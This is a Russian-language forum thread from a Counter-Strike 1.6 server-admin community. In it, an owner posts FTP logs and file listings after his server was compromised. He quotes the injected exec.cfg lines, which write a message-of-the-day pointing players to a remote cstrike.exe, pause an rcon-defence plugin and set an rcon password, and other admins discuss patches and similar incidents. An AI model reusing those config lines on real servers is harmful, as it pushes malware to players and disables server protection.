Беда на сервере, похоже на exec.cfg |
Наши новости:
|
Создание, настройка и продвижение counter-strike 1.6 серверов > > Создание, настройка и продвижение counter-strike 1.6 серверов > Защита Игрового сервера > Беда на сервере, похоже на exec.cfg
Важная информация
Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.
|
|
VaskaT
|
26.6.2013, 18:39
Сообщение
|
|
Форумчане, нужна ваша помощь! Сегодня захожу на сервер, а мне сворачивает кс и предлагает скачать какой-то файл!!! ( Скрин приложил ниже)
Вот что произошло с сервером за последний день : Логи Sun Jun 23 11:33:16 2013 [pid 2] CONNECT: Client "204.93.180.13" Sun Jun 23 12:01:41 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:01:43 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Sun Jun 23 12:01:45 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:01:46 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Sun Jun 23 12:01:47 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:01:48 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Sun Jun 23 12:05:46 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:05:46 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Sun Jun 23 12:05:55 2013 [pid 3] [hlds] OK DOWNLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/vips.ini", 723 bytes, 36.15Kbyte/sec Sun Jun 23 12:06:33 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/vips.ini", 712 bytes, 29.00Kbyte/sec Sun Jun 23 12:06:40 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/vips.ini", 712 bytes, 479.86Kbyte/sec Mon Jun 24 13:01:51 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:01:54 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Mon Jun 24 13:01:57 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:01:59 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Mon Jun 24 13:02:00 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:02:00 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Mon Jun 24 13:02:03 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:02:03 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Tue Jun 25 17:38:10 2013 [pid 2] CONNECT: Client "75.112.160.61" Tue Jun 25 17:38:12 2013 [pid 1] [mysql] FAIL LOGIN: Client "75.112.160.61" Tue Jun 25 17:38:15 2013 [pid 1] [mysql] FAIL LOGIN: Client "75.112.160.61" Tue Jun 25 17:38:18 2013 [pid 1] [mysql] FAIL LOGIN: Client "75.112.160.61" Tue Jun 25 20:57:57 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:57:59 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:00 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:58:03 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:04 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:58:04 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:14 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:58:14 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:30 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/maps/de_dust2_2x2_b.bsp", 1545124 bytes, 9128.48Kbyte/sec Tue Jun 25 20:59:02 2013 [pid 3] [hlds] OK DOWNLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/maps.ini", 489 bytes, 797.23Kbyte/sec Tue Jun 25 20:59:14 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/maps.ini", 505 bytes, 34.36Kbyte/sec 193.43.211.37 - это мой ИП, остальное - пару неудачных попыток.. хз от кого и кто пытался войти! вот файлы которые изменялись за последние 24 часа *****:/home/data/hlds# find . -mtime -1 | grep -v .log ./hlds01/cstrike ./hlds01/cstrike/addons/amxmodx/data ./hlds01/cstrike/addons/amxmodx/data/csstats.dat ./hlds01/cstrike/addons/amxmodx/data/vault ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.vault ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.vault ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.journal ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.journal ./hlds01/cstrike/addons/amxmodx/data/aim.temp ./hlds01/cstrike/addons/amxmodx/data/vault.ini ./hlds01/cstrike/addons/amxmodx/configs ./hlds01/cstrike/addons/amxmodx/configs/vips.ini ./hlds01/cstrike/addons/amxmodx/configs/maps.ini ./hlds01/cstrike/addons/amxmodx/configs/maps ./hlds01/cstrike/addons/amxmodx/configs/maps/prefix_de.cfg ./hlds01/cstrike/addons/amxmodx/configs/maps/main.cfg ./hlds01/cstrike/addons/amxmodx/configs/maps/prefix_cs.cfg ./hlds01/cstrike/addons/metamod ./hlds01/cstrike/addons/metamod/exec.cfg ./hlds01/cstrike/maps ./hlds01/cstrike/maps/de_dust2_2x2_b.bsp ./hlds01/cstrike/custom.hpk ./hlds01/cstrike/motd.txt ./hlds02 ./hlds02/cstrike/addons/amxmodx/data/csstats.dat ./hlds02/cstrike/addons/amxmodx/data/vault ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.vault ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.vault ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.journal ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.journal ./hlds02/cstrike/hlds02.pid ./hlds02/steam_appid.txt А вот и злодей: ./hlds01/cstrike/addons/metamod/exec.cfg ./hlds01/cstrike/addons/metamod/exec.cfg:motd_write http://31.200.239.201/cstrike.ex ...... motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya Как предотвратить это? Какие файлы, помимо motd.txt ( в котором кстати и было содержимое: http://31.200.239.201/cstrike.ex ) нужно почистить/удалить с сервера ??? И суть еще в том, что свой сервер размести здесь у вас на сайте, https://c-s.net.ua/forum/topic51866.html мне форумчанин написал что походу у меня бекдор.. я тогда не придал этому значения, ведь все было нормально, а оказывается что то есть !
Отредактировал: VaskaT, - 26.6.2013, 18:40
Прикрепленные файлы:
|
   |
|
Поблагодарили |
GOOD FELLOW
|
26.6.2013, 18:45
Сообщение
|
 
|
Цитата(VaskaT @ 26.6.2013, 19:39)  Форумчане, нужна ваша помощь! Сегодня захожу на сервер, а мне сворачивает кс и предлагает скачать какой-то файл!!! ( Скрин приложил ниже) Вот что произошло с сервером за последний день : Логи Sun Jun 23 11:33:16 2013 [pid 2] CONNECT: Client "204.93.180.13" Sun Jun 23 12:01:41 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:01:43 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Sun Jun 23 12:01:45 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:01:46 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Sun Jun 23 12:01:47 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:01:48 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Sun Jun 23 12:05:46 2013 [pid 2] CONNECT: Client "193.43.211.37" Sun Jun 23 12:05:46 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Sun Jun 23 12:05:55 2013 [pid 3] [hlds] OK DOWNLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/vips.ini", 723 bytes, 36.15Kbyte/sec Sun Jun 23 12:06:33 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/vips.ini", 712 bytes, 29.00Kbyte/sec Sun Jun 23 12:06:40 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/vips.ini", 712 bytes, 479.86Kbyte/sec Mon Jun 24 13:01:51 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:01:54 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Mon Jun 24 13:01:57 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:01:59 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Mon Jun 24 13:02:00 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:02:00 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Mon Jun 24 13:02:03 2013 [pid 2] CONNECT: Client "193.43.211.37" Mon Jun 24 13:02:03 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Tue Jun 25 17:38:10 2013 [pid 2] CONNECT: Client "75.112.160.61" Tue Jun 25 17:38:12 2013 [pid 1] [mysql] FAIL LOGIN: Client "75.112.160.61" Tue Jun 25 17:38:15 2013 [pid 1] [mysql] FAIL LOGIN: Client "75.112.160.61" Tue Jun 25 17:38:18 2013 [pid 1] [mysql] FAIL LOGIN: Client "75.112.160.61" Tue Jun 25 20:57:57 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:57:59 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:00 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:58:03 2013 [pid 1] [hlds] FAIL LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:04 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:58:04 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:14 2013 [pid 2] CONNECT: Client "193.43.211.37" Tue Jun 25 20:58:14 2013 [pid 1] [hlds] OK LOGIN: Client "193.43.211.37" Tue Jun 25 20:58:30 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/maps/de_dust2_2x2_b.bsp", 1545124 bytes, 9128.48Kbyte/sec Tue Jun 25 20:59:02 2013 [pid 3] [hlds] OK DOWNLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/maps.ini", 489 bytes, 797.23Kbyte/sec Tue Jun 25 20:59:14 2013 [pid 3] [hlds] OK UPLOAD: Client "193.43.211.37", "/hlds01/cstrike/addons/amxmodx/configs/maps.ini", 505 bytes, 34.36Kbyte/sec 193.43.211.37 - это мой ИП, остальное - пару неудачных попыток.. хз от кого и кто пытался войти! вот файлы которые изменялись за последние 24 часа *****:/home/data/hlds# find . -mtime -1 | grep -v .log ./hlds01/cstrike ./hlds01/cstrike/addons/amxmodx/data ./hlds01/cstrike/addons/amxmodx/data/csstats.dat ./hlds01/cstrike/addons/amxmodx/data/vault ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.vault ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.vault ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.journal ./hlds01/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.journal ./hlds01/cstrike/addons/amxmodx/data/aim.temp ./hlds01/cstrike/addons/amxmodx/data/vault.ini ./hlds01/cstrike/addons/amxmodx/configs ./hlds01/cstrike/addons/amxmodx/configs/vips.ini ./hlds01/cstrike/addons/amxmodx/configs/maps.ini ./hlds01/cstrike/addons/amxmodx/configs/maps ./hlds01/cstrike/addons/amxmodx/configs/maps/prefix_de.cfg ./hlds01/cstrike/addons/amxmodx/configs/maps/main.cfg ./hlds01/cstrike/addons/amxmodx/configs/maps/prefix_cs.cfg ./hlds01/cstrike/addons/metamod ./hlds01/cstrike/addons/metamod/exec.cfg ./hlds01/cstrike/maps ./hlds01/cstrike/maps/de_dust2_2x2_b.bsp ./hlds01/cstrike/custom.hpk ./hlds01/cstrike/motd.txt ./hlds02 ./hlds02/cstrike/addons/amxmodx/data/csstats.dat ./hlds02/cstrike/addons/amxmodx/data/vault ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.vault ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.vault ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_played_time.journal ./hlds02/cstrike/addons/amxmodx/data/vault/statsx_shell_hour_attend.journal ./hlds02/cstrike/hlds02.pid ./hlds02/steam_appid.txt А вот и злодей: ./hlds01/cstrike/addons/metamod/exec.cfg ./hlds01/cstrike/addons/metamod/exec.cfg:motd_write http://31.200.239.201/cstrike.ex ...... motdfile motd.txt motd_write http://31.200.239.201/cstrike.exe amxx pause rcon_defencer.amxx rcon_password zhenya Как предотвратить это? Какие файлы, помимо motd.txt ( в котором кстати и было содержимое: http://31.200.239.201/cstrike.ex ) нужно почистить/удалить с сервера ??? И суть еще в том, что свой сервер размести здесь у вас на сайте, https://c-s.net.ua/forum/topic51866.html мне форумчанин написал что походу у меня бекдор.. я тогда не придал этому значения, ведь все было нормально, а оказывается что то есть ! statsx_shell с этого форума поставь |
|
|
|
|
Vitaliy
|
26.6.2013, 18:46
Сообщение
|
Стаж: 14 лет
Сообщений: 2431 Благодарностей: 526 Полезность: 609  Меценат
|
патченую сошку от сюда ставил?
https://c-s.net.ua/forum/topic37395.html |
|
|
|
|
VaskaT
|
26.6.2013, 18:46
Сообщение
|
|
|
Цитата(GOOD FELLOW @ 26.6.2013, 19:45) statsx_shell с этого форума поставь с этого форума скачивал, вот с этой темы если не ошибаюсь https://c-s.net.ua/forum/topic37395.html |
|
|
|
|
VaskaT
|
26.6.2013, 18:48
Сообщение
|
|
|
Цитата(Pro(X-Gamer)Pro @ 26.6.2013, 19:46) патченую сошку от сюда ставил? https://c-s.net.ua/forum/topic37395.html Вы о Баг в изменении клиентского файла autobuy.txt ? Не понял что за сошка! |
|
|
|
|
Vitaliy
|
26.6.2013, 18:49
Сообщение
|
|
Стаж: 14 лет
Сообщений: 2431 Благодарностей: 526 Полезность: 609 Меценат
|
VaskaT,
VaskaT, постучи в скайп, временно помогу |
|
|
 Поблагодарили 1 раз
|
|
Johnny
|
26.6.2013, 18:55
Сообщение
|
|
|
|
|
Поблагодарили 1 раз
|
cs-portal
|
26.6.2013, 18:59
Сообщение
|
|
|
не вы один такой в моем мс тоже сервак был с Motd
файлик я скачал потом гляну что там |
|
|
|
|
Johnny
|
26.6.2013, 19:14
Сообщение
|
|
|
cs-portal,
В последнее время что-то массово заливают... 5 серверов сегодня забанил. |
|
|
|
|
Vitaliy
|
26.6.2013, 19:18
Сообщение
|
|
Стаж: 14 лет
Сообщений: 2431 Благодарностей: 526 Полезность: 609 Меценат
|
Johnny,
кажись как то обходят сошку крока, инфа пока что не 100% |
|
|
|
|
Kristl
|
26.6.2013, 19:24
Сообщение
|
|
Цитата(Pro(X-Gamer)Pro @ 26.6.2013, 20:18) Johnny, кажись как то обходят сошку крока, инфа пока что не 100% Обходят на 3 сервера закинули сошка стоит и плагин на орфее https://c-s.net.ua/forum/topic46373.html?pi...mp;#entry448133
Отредактировал: Kristl, - 26.6.2013, 19:25
|
|
|
|
|
mazdan
|
26.6.2013, 19:41
Сообщение
|
|
ну вообще в плагине на орфее есть бага, потом поправлю как-нибудь, на всякий случай.
 Не пишите мне в ЛС. Пишите на почту. В ЛС я пропускаю сообщения.
|
|
|
|
|
Kristl
|
26.6.2013, 19:47
Сообщение
|
|
|
|
|
|
|
|
Johnny
|
26.6.2013, 19:51
Сообщение
|
|
|
Alexan23,
Возможно, как с пулемета запросы идут... Цитата(Kristl @ 26.6.2013, 21:47) Я не такой 
|
|
|
|
|
Kristl
|
26.6.2013, 19:55
Сообщение
|
|
|
прочекайте ссылку http://31.200.239.201/ походу положил или канал себе забил
|
|
|
|
  |
0 пользователей и 1 гостей читают эту тему:
Powered By Invision Power Board
© 2005-2026
Counter Strike Support Community
Counter Strike Support Community